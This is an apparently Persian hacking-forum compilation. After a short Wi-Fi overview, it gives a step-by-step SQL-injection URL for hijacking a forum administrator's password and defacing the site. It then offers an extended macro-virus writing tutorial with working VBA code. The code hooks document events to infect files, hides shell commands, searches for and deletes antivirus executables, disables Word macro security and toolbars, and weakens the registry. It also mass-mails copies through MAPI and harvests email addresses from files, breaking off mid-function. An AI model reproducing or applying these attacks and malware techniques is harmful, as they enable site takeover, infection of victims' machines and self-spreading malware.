براى استفاده از اين سيستم ايستگاه هايى به نام Access point در مناطق مختلف و به فواصل چند صد مترى قرار مى گيرد. اين ايستگاه ها امواج راديويى را در هوا منتشر مى كنند و هر كامپيوترى كه به Wi-Fi مجهز باشد و در محدوده اين ايستگاه ها قرار داشته باشد قادر به استفاده از اينترنت است و كاربران با قرار دادن يك كارت سخت افزارى IEEE802.11b و يا وصل كردن يك دستگاه Wi-Fi اكسترنال از طريق USB به كامپيوتر خود قادر به استفاده از اين سيستم هستند. قيمت اينترنت در اين سيستم بسيار مناسب است. مثلاً در كشور آمريكا يك Account نامحدود يك ماهه با اين سرويس به مبلغ ۲۰ تا ۳۰ دلار در اختيار كاربران قرار مى گيرد. از نظر برد موثر هم حداكثر تا ۱۵۰ متر اطراف Access Point مورد پوشش قرار مى گيرد. در اين حالت سرعت انتقال ارتباط ۱mbps است. البته هر چقدر فاصله كاربر با ايستگاه اصلى كمتر از ۱۵۰ متر باشد سرعت انتقال اطلاعات بيشتر خواهد شد. مثلاً سرعت انتقال اطلاعات در فاصله ۱۰۰ مترى mbps5.5، در فاصله ۸۰ مترى ۸mbps و در فاصله ۵۰ مترى و كمتر از آن ۱۱mbps است

 اين آموزش بر روي فرم هاي ورژن 2 و پايين تر عمل خواهد كرد در اولين قدم بايد بر روي فرم Sign Up كرده و يوزر و پسورد به همراه يك ايميل واقعي دريافت كنيد . در ادامه اميلي براي Confirm عضويت شما فرستاده ميشود .

در ادامه به Member list رفته و يا به لينك زير برويد :

http://url/memberlist.php

در ادامه ميتوانيد بر روي هر كدام از ممبر ها كليك كرده و URL را بر روي آدرس بار خود مشاهده كنيد

در ادامه Tag زير را در آخر URL پيدا خواهيد كرد بدون هيچگونه quotes

"userid="

اين عدد را در آخر اضافه كنيد "* 1 " به عنوان مثال :

http://url/member.php?action=getinfo&userid=1

در ادامه با انجام اين كار شما نام Administrator را پيدا خواهيد كزد ( يوزر ادمين سايت ) هر چيزي كه مشاهده ميكنيد يادداشت كنيد

حالا همه چيز آماده شده . بصورت زير عمل كنيد :

URL زير را كپي كنيد : و بصورت زير آنرا Edit كنيد :



http://url/member.php?action=login&username=User&password=Sas an&url=");".$users=$DB_site->query("update+user+set+email='123456'+WHERE+usern ame='lamer'")."

Username : در اينجا يوزري كه شما در فرم با آن رجيستر كرده ايد وارد كنيد مثلا Dj_agoustinno

Password : در اينجا پسورد يوزر خودتون را وارد كنيد ( Sasan )

Email Adress : در اينحا آدرس ايميلي كه با آن رجيستر كرديد وارد نماييد ( EMail@yahoo.com )

Admin : نام ادمين سايت كه بدست اورديد ( Lamer )

خوب اگه تمام كارهايي كه گفتم را درست انجام داده باشيد صفحه refresh شده و اين كار ادامه پيدا ميكند بدون توقف . خوب در اين حالت به Main Page رفته و Login كنيد با همين يوزر و پسورد ي كه الان ازشون استفاده كرديد . در اينجا صفحه اي دريافت ميكنيد كه يوزر و پسورد شما اشتباه ميباشد بر روي لينكي كه در پايين قرار گرفته و پسورد جديد براي شما ارسال ميكند كليك كرده ! و آدرس ايميلي كه پسورد براي شما ارسال شده وارد كنيد حالا به ايميل خود رفته و پسورد خود را دريافت كنيد !! اما ..... اين ....... !!! اين پسورد شما نيست پسورد ادمين سايت ميباشد J

D e f a c e m e n t

حالا وقت Deface كردن يا هر كاري كه شما دوست داريد رسيده !!

http://url/admin/index.php

در اينجا Login كنيد !* اما اگر موفق نشديد به Main Page رفته و ابتدا از آنجا وارد شويد و بعد از ورود به صفحه ي ادمين رفته و دوباره Login كنيد

براي Deface كردن به سمت چب نگاه كنيد "Templates" بر روي Edit كليك كرده و در قسمت راست Main Frame را ميبينيد بر روي آن Edit را بزنيد ممكنه كه بر روي Default باشد . اگر نبود اولي را انتخاب كنيد . در صفحه ي بعدي بر روي Submit كليك كنيد . به پايين آمده و Fourmhome را پيدا كرده و بر روي آن Edit را بزنيد در قسمت بعدي شما كد هاي HTML صفحه ي اول را مشاهده ميكنيد . بعد از گذاشتن كدهاي خودتون و قرار دادن آنها Submit را زده تا Index شما در صفحه ي اول به نمايش در بيايد

توضیحات

---

 When you use some exploits in the exploits and POC section of the forum, you will find an MD5 hash. Like this one: 6eae4726b5533b21dafb9df4a3022ad6. All the MD5 hash cracker does, it work out what the password is from that hash be comparing it to other hashes. As there are so many cobinations, this can take hours, even days if the password is over 9 letters/numbers.
_________________

دانلود

 

 سلام
طي چند بخش سعي ميكنم چگونگي نوشت ماكر ويروس (كه از بقيه ساده تر هم هست) را براتي شما توضيح بدهم . توجه كنيد اين مطالب فقط شما را اشنا ميكند با ماكرو ويروس ها و توقع ساختن يك ويروس نويس از شما را نداشته باشيد.

در مورد منابع هم لازم است كه بگويم اين مطالب مجموعه يادداشت هايي است كه از astalavista و areyoufearless و نوشته های یک ویروس نویس سوئدی که مدتي قبل من جمع آوري كرده بودم.

اميد وارم مفيد واقع بشه
مقدمه:
ماکرو ویروس نوعی از ویروس ها بوده که از خانواده word استفاده می کنند که در اینجا ما از دو نوع 97 و 2000 استفاده می کنیم (توجه کنید که ورد 97 بسیار برای ماکرو ویروس نویسی مناسب می باشد) و همچنین از VB هم برای application ها استفاده میشود.
ماکرو ویروس ها خود را بک فایل Document یا template می چسباند و بعد از باز شدن آن توسط قربانی طبق تنظیمات موجود کامپیوتر را آلوده می نماید و آلودگی را بر روی template پیش فرض ذخیره و با باز شدن هر سند آن را نیز آلوده می نماید.

چند اصطلاح در مورد ویروس ها :
VXافرادی که به جابجایی ویروس می پردازند
VCK کیت های ساخت ویروس
AV آنتی ویروس
Worm برنامه های کامپیوتری که خود را کپی و منتشر می سازد.
Boot sector virus ویروس هایی که بوت سکتور را آلوده و در زمان بوت شدن کامپیوتر به همراه دیگر برنامه ها اجرا میشوند.
Trojan اجزه دسترسی از راه دور و بدون مجوز صاحب آن را به شما میدهد که به آنها RAT نیز گفته میشود.
File infector خود را به فایلی متصل نموده و آن را آلوده می سازد ( معمولا فایل های exe, com,sys,batch)
Dropper برنامه ویژهای که وظیفه قرار دادن ویروس بر روی کامپیوتر قربانی را دارد.
Stealth virus ویروسی که عملکرد آن از دید قربانی پنهان میباشد.
Polymorphic نوعی ویروس که تواننایی اصلاح را داراست و تشخیص را مشکل می سازد.
Fast infection آلوده ساختن تمام پرونده های باز
Payload مهمترین بخش ویروس که زمان اجرا پروسه مربوط به ویروس را تعیین میکند.
Tunneling Virus ویروسی که مفسر ها را یافته و باز خوانی میکند.
ANSII bomb وقتی یک کاراکتر یا یک سری از کاراکتر ها را فشار میدهیم آن زمان Payload ویروس آغاز به کار کرده و مطا بق آن شروع به کار میکند. (مثلا با فشار دادن اسپیس)
Resident Infection ویروسی که خود را در RAM قرار میدهد.
BIS آلودگی در بوت سکتور
TSR ویروس فعالیت خود را پایان داده است اما هنوز دز کامپیوتر قربانی موجود میباشد.

مشاهده سورس یک ماکرو ویروس:
در اینجا شما طریقه یافتن و مشاهده ماکرو را یاد میگیرید.
برای یافنن یک ماکرو یم روش همان پیام خطا هنگام اجرا بوده و در صورتی که به شکل هیدن اجرا شود شما باید Normal.dot را پیدا کنید و اگر حجم آن بیش از 40 -50 kb باشد آن تغییر نموده و شما آلوده شده اید.) حجم این فایل در حالت عادی 26 k-27k می باشد.)
برای مشاهده سورس ماکر ویروس آن را بیابید سپس در ورد 97 یک Document را باز نموده سعی نمایید به VBA بروید در این حالت پنجره باز و هشداری با این مضمون را میدهد (هدف از این بخش فعال نمودن بخش محافظتی ورد در مقابل ماکرو ها و عدم اجرا آنها است)
Macro's are in this document –
Disable?
البته ممکن است این مورد به صورت پیش فرض فعال شده باشد. سپس بر روی Yes کلیک کنید و حال میتوانید ویروس خود را بدون آلوده شدن مشاهده نمایید.

در اين بخش در مورد دستور ها و يكي از روش هاي چهار گانه مخفي سازي صحبت ميكنيم.
طریقه کد نویسی:
در بخش زیر دستورات لازمه را برای شما بیان میکنم:
Document_Open() دستور آلوده ساختن document در هنگام باز شدن می باشد.
Document_New() دستور آلوده ساختن هر پرونده جدید می باشد.
Document_Close() دستور آلوده ساختن هر پرونده در زمانی که آن بسته میشود.
FileSaveAs() دستور آلوده ساختن پرونده در هنگامSaveAs میباشد.
FileSave() دستور الوده سازی پرونده در هنگام Save میباشد.
ToolsSpelling() دستور الوده سازی به هنگام چک کردن spell میباشد.
ToolsGrammar() دستور آلوده ساختن در هنگام چک کردن گرامر می باشد.
AutoExec() دستور الوده ساختن هنگامی که پرونده باز است (مخصوصا برای template )
AutoExit دستور آلوده ساختن هنگامی که پرونده بسته میباشد (مخصوصا برای template)
ViewVBCode() این دستور و دو دستور زیر هر سه در جهت پنهان سازی به کار میروند.
ToolsMacro()
FileTemplates().
Shell "command.com /whatever you want", vbHide این دستور در داس اجرا و دستور vbHide پنجره داس را پنهان نموده و قربانی از اتفاق افتاده اطلاعی نمییابد.
به طور مثال در Shell "command.com /c ftp.exe", vbHide اف تی پی برای پنهان کردن عملیات مورد استفاده قرار گرافته است.

در بخش بالا یک سری از دستورات مورد استفاده در ماکرو ویروس نویسی را مشاهده کردید فقط توجه کنید که در آغاز باید از sub استفاده کنید و در انتها هم از End Sub استفاده کنید.
به مثال زیر توجه نمایید:
Sub Document_New()
msgbox "x11011110x"
End Sub
آنرا در VBA خود قرار دهید ماکرو را اجرا کنید سپس یک document ایجاد نمایید و مشاهده می کنید که یک پنجره جدید پدیدار میشود.
ضمنا میتوانید از دستور On Error Resume Next نیز استفاده کنید تا در هنگام ایجاد خطا به کار خود ادامه دهد.
یک فایل را باز نموده و برای تمربن بیشتر مثال زیر را می نویسیم
Sub Document_Open()
On Error Resume Next همیشه در ابتدای ساب این مورد را استفاده کنید.
Open "C:\xde.txt" For Output As #1 این دستور یم فایلی به نام xde.txt را در داریو سی ایجاد یا باز می نماید.
Print #1, "x11011110x" این دستور x11011110x را در فایل xde.txt قرار میدهد.
Close #1 این دستور فایل های بازشده قبلی را برای شما میبندد.
Msgbox "File Written to" این پیام را برای شما به نمایش میگذارد.

تکنیک های پنهان سازی:
برای این کار روش های متفاوتی وجود دارد که من 4 روش را برای شما توضیح میدهم:

1. پاک کردن آنتی ویروس
همه ی ما با آنها آ شنا هستیم در این بخش هدف ما یافتن راهی برای از کار انداختن آنتی ویروس ها است. برای این کار باید فایل .exe مربوط به آنتی ویروس را بیابیم و آنرا پاک کنیم و بعد از آن محیط کار ما مساعد میشود. اما مشکلی اساسی را در پیش روی خود داریم در اکثر موارد تنظیمات را به شکلی تنظیم میکنیم که اگر آنتی ویروس در مسیر پیش فرض نصب شده باشد در آن صورت آن را از کار می اندازد و اگر در مسیر دیگر باشد کاری انجام نمیدهد پس باید یک موتور جستجو گر را در ویروس تعبیه کنیم که فایل مربوطه را یافته و نابود سازد.

Sub Mainz()
Set Fs = Application.FileSearch این دستور Fs یه عنوان فیل جستجو گر Application قرار میدهد.
es$ = "xdez.txt" این دستور es$ را برای xdez.txt تعریف می نماید.
.LookIn = "C:\" این دستور فایل یا درایو را معین می سازد.
.SearchSubFolders = True این دستور میگوید که کل فایل یا درایو را جستجو نماید.
.FileName = es$ این دستور فایل نیم دنبا ل es$ میگرد.
If .Execute > 0 Then اگر پیدا گشت دستورات زیر را اجرا کن.
MsgBox "File Found" این دستور در پیامی پیدا شده فایل را اطلاع میدهد.
Set ds = CreateObject("Scripting.FileSystemObject") این دستور شی FSO را ایجاد می نماید.
Set fy = ds.GetFile(es$) این دستور اجازه میدهد که مسیر فایل را به دست آوریم
h = (fy.Path) این دستور به مسیر فایل یک متغیر را نسبت میدهد.
SetAttr h, vbNormal ویژگی فایل را به شکل نرمال قرار میدهد.
Kill (h) این دستور فایل را پاک می کند.
MsgBox "File Illimenated" این دستور شما را از پاک شدن آگاه می سازد.
Else
MsgBox "File was not found." این دستور میگوید که فایل پیدا نشد
End If
End With
End Sub

شاید در بخش بالا یک سری مطالب برای شما گیج کننده باشد که سعی میکنم یک سری از مطالب گیج کننده را برای شما باز کنم.
شاید در نگاه اول مثلا سوال کنید که برای متغیر نام Fy را در نظر گرفتم علت این برای مشکل نمودن تشخصی توسط انتی ویروس می باشد.
Set ds = CreateObject("Scripting. ")
این خط اجازه پیدا نمودن مسیر فایل و ایجاد یک FileSystemObject را برای استفاده در ماکرو به شما می دهد.
Set fy = ds.GetFile(es$)
این خط دستور را مشاهده میکنید که در واقع همانند File Operator.GetFile(filespec) کار میکند که در این مورد File Operator تعریف شده در ds و داریم ds.GetFile(filespec) since و file spec تعریف گشته در es$ و درشکل کلی به
Set fy = ds.GetFile(es$) می رسیم.
خط بعدی دستور h = (fy.Path) میباشد . این دستور h را در مسیر فایل ما قرار میدهد (مثلا . C:\My Documents\xdez.txt)
SetAttr h, vbNormal این دستور یک ویژگی را به فایل میدهد و آن هم اینست که آن را به صفت نرمال را نسبت می دهد و آن را قابل پاک نمودن میکند.
Kill (h) که به زبان دیگر به شکل Kill ("C:\My Documents\xdez.txt") و تمام چیز هایی را که در مسیر بیابد پاک مینماید.

در بخش زیر دستورات را بدون توضیحات مربوط به دیباگ مشا هده میکنید.
Sub Mainz()
On Error Resume Next
Set Fs = Application.FileSearch
es$ = "xdez.txt"
With Fs
.LookIn = "C:\"
.SearchSubFolders = True
.FileName = es$
If .Execute > 0 Then
Set ds = CreateObject("Scripting.FileSystemObject")
Set fy = ds.GetFile(es$)
h = (fy.Path)
SetAttr h, vbNormal
Kill (h)
Else
End If
End With
End Sub

خوب اگر حواس شما جمع باشد باید متوجه یک تغییر باشید و آن هم On Error Resume Next است که باید همیشه در نوشتن ماکرو ویروس ها از آن استفاده کنید این دستور به راحتی تمام Error ها را توجه نکرده و به خط بعد دستوری رفته و به کار خود ادمه میدهد.
در این بخش تنها یک نکته باقی ماند و آن هم پاک کردن آنتی ویروس از طریق دستور برای امتحان آنتی ویروس نصب کنید و به جای es$ در es$ ="xdez.txt" باید به طور مثال Norton.exe که به شکل زیر میرسیم:
es$ = "Norton.exe"

یک مساله دیگر اینکه شما با ساختن یک اسکریپت می توانید autoexec.bat را باز کنید و چک کنید.bat تا متوجه گردید آیا پس از پاک شدن اولیه دوباره آنتی ویروس نصب شده است و در صورت نصب دوباره آن را پاک کنید.

 .پیام های خطا:
یک روش خوب برای جلوگیری از شناخته شدن جلوگیری است و آن هم استفاده از پیام های خطا می باشد. از این دست می توان به مثا ل زیر اشاره کرد:
Sub ViewCode()
MsgBox "Not enough memory", 16
End Sub

تنها کاری که باید انجام دهیم فقط و فقط افزایش یک مسج باکس بوده و معین کردن نوع پیام مورد نظر ما در پنجره . یک مثال:
MsgBox "This program has performed an illegal operation and will be shut
down.", vbCritical, "Microsoft Word"
به عنوان مثال برای پیام خطا های اطلاعاتی به شکل MsgBox "Not Enough Memory",
vbInformation
و برای خطاهای ضروری به شکل : MsgBox "Not Enough Memory",
vbExclamation
باشد.
در قسمت ذیل نیز یک سری از موارد مورد استفاده را مشاهده می نمایید:
Criticals:
16 - Critical
18 - Abort/Ignore/Retry
19 - Yes/No/Cancel
20 - Yes/No
21 - Retry/Cancel
Standard
1 - Ok/Cancel
2 - Abort/Ignore/Retry
3 - Yes/No/Cancel
4 - Yes/No
5 - Retry/Cancel




3. از کار انداختن Tool bar ها:
در ورد یک سری تول بار ها موجود بوده که به شما اجازه داده وضعیت ماکرو فایل ها را در تمامی مراحل کنترل و مشاهده کنید و باید آنها غیر فعال گردد. ما می خواهیم تغیرات امنیتی در ماکرو آلوده خود را به شکل زیر انجام دهیم:

CommandBars("Macro").Controls("Security...").Enabl ed = 0

خط بعد دکمه ماکرو را غیر فعال می سازد
CommandBars("Macro").Controls("Macros...").Enabled = 0
توجه نموده که می توانید به جای 0 از False و به جای Enable نیز از Delete استفاده کنید.
CommandBars("Tools").Controls("Customize...").Enab led = False
CommandBars("View").Controls("Toolbars").Enabled = False
CommandBars("View").Controls("Status Bar").Enabled = False
CommandBars("Tools").Controls("Templates and Add-Ins...").Enabled = False
CommandBars("Format").Controls("Style...").Enabled = Fals


در دستورات بالا ما یک بار status را که بر فعالیت ها نظارت میکرد را پاک نمودیم و احتما ل یافتن ماکرو خود را کاهش دادیم.
نکته دیگر اینست که شما می خواهید که در ویروس شما اصل ذخیره وجود داشته باشد یعنی کار بر را در هر شرایطی وادار به ذخیره نموده و در واقع به کاربر میگوید که فایل ذخیره شده است و دیگر به اجازه شما برای ذخیره احتیاجی نمی باشد.
NormalTemplate.Saved = True
ActiveDocument.Saved = True
دستور زیر نیز در راستای اجرای اتوماتیک وار ماکرو می باشد:
Options.VirusProtection = False
و دستور زیر نیز دکمه cancel را غیر فعال میکند حال مفید بودن این مورد را خودتان تصور کنید.
Application.EnableCancelKey = wdCancelDisabled
Application.ScreenUpdating = False 'this one is rather straightforward.

4. غیر فعال کردن ریجستری:
در این روش ما بوسیله ی دست بردن در ریجستری به هدف خود می رسیم. با دستور
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\W ord\Security", "Level") =
1&
سطحی امنیتی ماکرو را به پایین ترین حد کاهش میدهد.
در بخش پایین یک سری از این دستور ها را مورد بررسی قرار میدهیم:

کد های ریجستری زیر درایو ها را از Mycomputer حذف می نماید.
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
Nodrives = 3
Disables Adding Printers:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
NoAddPrinter = 1
Sub folders at start-programs will be disabled.
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
NoStartMenuSubFolders = 1
تمام موارد موجود بر روی دسکتاپ را مخفی می سازد:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
NoDesktop = 1
Message box will appear on start
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Winlogon
LegalNoticeCaption = Text
LegalNoticeText = Text
از میان بردن دکمه استارت
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
"NoCloseKey" = "1"
تنظیم دایرکتوری ویندوز
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Setup\SourcePath
"WinDir"="C:\Windows\"
نمایش صفحه ارتباطات با شبکه

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunServices]
"LoadPowerProfile"="Rundll32.exe powrprof.dll,LoadCurrentPwrScheme"
"TrueVector"="C:\WINDOWS\SYSTEM\ZONELABS\VSMON .EXE -service"
"MiniLog"="C:\\WINDOWS\SYSTEM\ZONELABS\MINILOG .EXE -service"
این مورد پوشه Recent Documents را غیر فعال نموده که من پیشنهاد می کنم حتما از آن استفاده کنید.

[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer]
"NoRecentDocsMenu"="1"
Gets rid of the task bar:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer]
"NoTaskbar"=dword:00000000
).Name="Virus name" Then
Goto Destination
Next i



استفاده از MAPI برای فرستادن میل:
در قسمت آخر آموزش شما با چگونگی انتشار ماکر ویروس خود آشنا میشوید.
از MAPI win32 api برای یافتن آدرس های ایمیل و ارسال نسخه های از خود استفاده میکند. ما ار تابع های MAPILogOn, MAPISendMail, MAPILogoff برای بر طرف کردن کار های خود استفاده میکنیم. این کد ها در پروسیژر در راستای ارسال میل ها با متن مورد نظر عمل میکنند.
Public Const MAPI_AB_NOMODIFY = &H400
Public Const MAPI_BCC = 3
Public Const MAPI_BODY_AS_FILE = &H200
Public Const MAPI_CC = 2
Public Const MAPI_DIALOG = &H8
Public Const MAPI_E_AMBIGUOUS_RECIPIENT = 21
Public Const MAPI_E_AMBIG_RECIP = MAPI_E_AMBIGUOUS_RECIPIENT
Public Const MAPI_E_ATTACHMENT_NOT_FOUND = 11
Public Const MAPI_E_ATTACHMENT_OPEN_FAILURE = 12
Public Const MAPI_E_ATTACHMENT_WRITE_FAILURE = 13
Public Const MAPI_E_BAD_RECIPTYPE = 15
Public Const MAPI_E_BLK_TOO_SMALL = 6
Public Const MAPI_E_DISK_FULL = 4
Public Const MAPI_E_FAILURE = 2
Public Const MAPI_E_INSUFFICIENT_MEMORY = 5
Public Const MAPI_E_INVALID_EDITFIELDS = 24
Public Const MAPI_E_INVALID_MESSAGE = 17
Public Const MAPI_E_INVALID_RECIPS = 25
Public Const MAPI_E_INVALID_SESSION = 19
Public Const MAPI_E_LOGIN_FAILURE = 3
Public Const MAPI_E_LOGON_FAILURE = MAPI_E_LOGIN_FAILURE
Public Const MAPI_E_MESSAGE_IN_USE = 22
Public Const MAPI_E_NETWORK_FAILURE = 23
Public Const MAPI_E_NO_MESSAGES = 16
Public Const MAPI_E_NOT_SUPPORTED = 26
Public Const MAPI_E_TEXT_TOO_LARGE = 18
Public Const MAPI_E_TOO_MANY_FILES = 9
Public Const MAPI_E_TOO_MANY_RECIPIENTS = 10
Public Const MAPI_E_TOO_MANY_SESSIONS = 8
Public Const MAPI_E_TYPE_NOT_SUPPORTED = 20
Public Const MAPI_E_UNKNOWN_RECIPIENT = 14
Public Const MAPI_ENVELOPE_ONLY = &H40
Public Const MAPI_FORCE_DOWNLOAD = &H1000
Public Const MAPI_GUARANTEE_FIFO = &H100
Public Const MAPI_LOGOFF_SHARED = &H1
Public Const MAPI_LOGOFF_UI = &H2
Public Const MAPI_LOGON_UI = &H1
Public Const MAPI_NEW_SESSION = &H2
Public Const MAPI_OLE = &H1
Public Const MAPI_OLE_STATIC = &H2
Public Const MAPI_ORIG = 0
Public Const MAPI_PEEK = &H80
Public Const MAPI_RECEIPT_REQUESTED = &H2
Public Const MAPI_SENT = &H4
Public Const MAPI_SUPPRESS_ATTACH = &H800
Public Const MAPI_TO = 1
Public Const MAPI_UNREAD = &H1
Public Const MAPI_UNREAD_ONLY = &H20
Public Const MAPI_USER_ABORT = 1
Public Const MAPI_E_USER_ABORT = MAPI_USER_ABORT
Public Const SUCCESS_SUCCESS = 0
'-- mapi message recipient object type
Public Type MapiRecip
Reserved As Long
RecipClass As Long
Name As String
Address As String
EIDSize As Long
EntryID As String
End Type
'-- mapi message file object type
Public Type MapiFile
Reserved As Long
Flags As Long
Position As Long
PathName As String
FileName As String
FileType As String
End Type
'-- mapi message object type
Public Type MAPIMessage
Reserved As Long
Subject As String
NoteText As String
MessageType As String
DateReceived As String
ConversationID As String
Flags As Long
RecipCount As Long
FileCount As Long
End Type
Public Declare Function MAPILogoff Lib "MAPI32.DLL" (ByVal Session&, _
ByVal UIParam&, ByVal Flags&, _
ByVal Reserved&) As Long
Public Declare Function MAPILogon Lib "MAPI32.DLL" (ByVal UIParam&,_
ByVal User$, ByVal Password$, _
ByVal Flags&, ByVal Reserved&,_
Session&) As Long
Public Declare Function MAPISendMail Lib "MAPI32.DLL" Alias _
"BMAPISendMail" (ByVal Session&,
ByVal _
UIParam&, Message As MAPIMessage, _
Recipient() As MapiRecip, File() As
MapiFile, _
ByVal Flags&, ByVal Reserved&) As
Long

' Mailsending procedure
' sTo - target adress (where the email should ne delivered)
' sSubject - email subject
' sMessage - message body text
Public Function api_SendMail(sTo As String, sSubject As String, sMessage As
String)
' * use api functions to send mail
'
On Error Goto suxx
Dim Rtn As Long '-- return value For api calls
Dim objMsg As MAPIMessage''-- message object
Dim objRec() As MapiRecip''-- recipient object array
Dim objFile() As MapiFile''-- file object array
Dim hMAPI As Long'-- session handle
ReDim objRec(1)
ReDim objFile(1)
'
'-=-=-=-=-=-
'file object
'-=-=-=-=-=-
'
' * default - not expecting to send a file
'
objFile.Reserved = 0
'
' * values not used
'
'objFile.Flags
'objFile.Position = -1
'objFile.PathName = "c:\mtx4ever.exe"
'objFile.FileName = 0
'objFile.FileType = 0
'
'-=-=-=-=-=-=-=-=
'recipient object
'-=-=-=-=-=-=-=-=
'
objRec(0).Reserved = 0
objRec(0).RecipClass = 1
objRec(0).Name = sTo
'
' * values not used for recipient
'
'objRec.Address
'objRec.EIDSize
'objRec.EntryID
'
'-=-=-=-=-=-=-=
'message object
'-=-=-=-=-=-=-=
'
objMsg.Reserved = 0
objMsg.Subject = sSubject ' mail subject
objMsg.RecipCount = 1
objMsg.FileCount = 0 ' how many files are in message
objMsg.NoteText = sMessage ' mail message
'
' * values not used for message
'
'objMsg.MessageType
'objMsg.DateReceived
'objMsg.ConversationID
'objMsg.Flags
' We will create a session for e-mail sending
' using standart windows password for sending emails.
' it's possible not to use MS Exchange Settings, and simply put 0 to that
option
Rtn = MAPILogon(0, "MS Exchange Settings", "", MAPI_LOGON_UI, 0, hMAPI)
' * send mail message through MAPI
Rtn = MAPISendMail(hMAPI, 0, objMsg, objRec, objFile, 0, MAPI_DIALOG)
' * logoff MAPI application
Rtn = MAPILogoff(hMAPI, 0, 0, 0)
' * close this function
Exit Function
suxx:
Msgbox "MOD_MAIL.api_SendMail()"
End Function

یک موتور جستجو را بو سیله ی تابع های ای پی آی ایجاد نموده و آن آدرس ها را یافته و آنها را ذخیره می نماید . البته می توان آدرس هایی زیادی را در مسیر زیر یافت:
C:\windows\Temporary Internet Files

مدل باس
Private Declare Function FindFirstFile Lib "kernel32" _
Alias "FindFirstFileA" _
(ByVal lpFileName As String, _
lpFindFileData As WIN32_FIND_DATA) As Long
Private Declare Function FindNextFile Lib "kernel32" _
Alias "FindNextFileA" _
(ByVal hFindFile As Long, _
lpFindFileData As WIN32_FIND_DATA) As Long
Private Declare Function GetFileAttributes Lib "kernel32" _
Alias "GetFileAttributesA" _
(ByVal lpFileName As String) As Long
Private Declare Function FindClose Lib "kernel32" _
(ByVal hFindFile As Long) As Long
Const MAX_PATH = 260
Const MAXDWORD = &HFFFF
Const INVALID_HANDLE_VALUE = -1
Const FILE_ATTRIBUTE_ARCHIVE = &H20
Const FILE_ATTRIBUTE_DIRECTORY = &H10
Const FILE_ATTRIBUTE_HIDDEN = &H2
Const FILE_ATTRIBUTE_NORMAL = &H80
Const FILE_ATTRIBUTE_READONLY = &H1
Const FILE_ATTRIBUTE_SYSTEM = &H4
Const FILE_ATTRIBUTE_TEMPORARY = &H100
Private Type FILETIME
dwLowDateTime As Long
dwHighDateTime As Long
End Type
Private Type WIN32_FIND_DATA
dwFileAttributes As Long
ftCreationTime As FILETIME
ftLastAccessTime As FILETIME
ftLastWriteTime As FILETIME
nFileSizeHigh As Long
nFileSizeLow As Long
dwReserved0 As Long
dwReserved1 As Long
cFileName As String * MAX_PATH
cAlternate As String * 14
End Type
Function StripNulls(OriginalStr As String) As String
If (InStr(OriginalStr, Chr(0)) > 0) Then
OriginalStr = Left(OriginalStr, _
InStr(OriginalStr, Chr(0)) - 1)
End If
StripNulls = OriginalStr
End Function
Function FindFilesAPI(path As String, _
SearchStr As String, _
FileCount As Integer, _
DirCount As Integer)
Dim FileName As String ' variable holding filename
Dim DirName As String ' variable holding subdir name
Dim dirNames() As String ' filenames buffer
Dim nDir As Integer ' number of directories in this path
Dim i As Integer ' cycle counter
Dim hSearch As Long ' search descriptor
Dim WFD As WIN32_FIND_DATA
Dim Cont As Integer
If Right(path, 1) <> "\" Then path = path & "\"
' subdirectories search
nDir = 0
ReDim dirNames(nDir)
Cont = True
hSearch = FindFirstFile(path & "*", WFD)
If hSearch <> INVALID_HANDLE_VALUE Then
Do While Cont
DirName = StripNulls(WFD.cFileName)
If (DirName <> ".") And (DirName <> "..") Then
' checking directory
If GetFileAttributes(path & DirName) And _
FILE_ATTRIBUTE_DIRECTORY Then
dirNames(nDir) = DirName
DirCount = DirCount + 1
nDir = nDir + 1
ReDim Preserve dirNames(nDir)
End If
End If
Cont = FindNextFile(hSearch, WFD)
Loop
Cont = FindClose(hSearch)
End If
hSearch = FindFirstFile(path & SearchStr, WFD)
Cont = True
If hSearch <> INVALID_HANDLE_VALUE Then
While Cont
FileName = StripNulls(WFD.cFileName)
If (FileName <> ".") And (FileName <> "..") Then
FindFilesAPI = FindFilesAPI + _
(WFD.nFileSizeHigh * MAXDWORD) + _
WFD.nFileSizeLow
FileCount = FileCount + 1
'List1.AddItem path & FileName
ggg = path & FileName
MsgBox ggg
Call try(ggg)
End If
Cont = FindNextFile(hSearch, WFD) ' Get next file
Wend
Cont = FindClose(hSearch)
End If
' if there are subdirectories
If nDir > 0 Then
' perform recursive search
For i = 0 To nDir - 1
FindFilesAPI = FindFilesAPI + _
FindFilesAPI(path & dirNames(i) _
& "\", SearchStr, FileCount, DirCount)
Next i
End If
End Function
Private Sub Search()
Dim SearchPath As String, FindStr As String
Dim FileSize As Long
Dim NumFiles As Integer, NumDirs As Integer
Screen.MousePointer = vbHourglass
'SearchPath = directory name
SearchPath = "C:\My Documents"
' FindStr = filename we are searching for
FindStr = "*.*htm"
FileSize = FindFilesAPI(SearchPath, FindStr, NumFiles, NumDirs)
Screen.MousePointer = vbDefault
End
End Sub
Private Sub try(fName)
On Error Resume Next
WindowSize = 5000
seekPoint = 1
Open fName For Binary As 1
Do While seekPoint < LOF(1)
VarString$ = String$(WindowSize, " ")
Get #1, seekPoint, VarString$
seekPoint = seekPoint + WindowSize - 50
AsIs = search_(VarString$)
Loop
Close #1
End Sub
Function mid_(a$, i, j1)
On Error Resume Next
s = 0
If i > 0 And (i + j1 - 1) <= Len(a$) Then
b$ = Mid$(a$, i, j1)
If b$ >= "a" And b$ <= "z" Then s = 1
If b$ >= "A" And b$ <= "Z" Then s = 1
If b$ >= "0" And b$ <= "9" Then s = 1
If b$ = "-" Or b$ = "_" Or b$ = "+" Or b$ = "." Or b$ = "@" Then s = 1
End If
mid_ = s
End Function
Function search_(a$)
On Error Resume Next
s$ = ""
For i = 1 To Len(a$)
If Mid$(a$, i, 1) = "@" Then
name_ = "": j = i
Do
j = j - 1
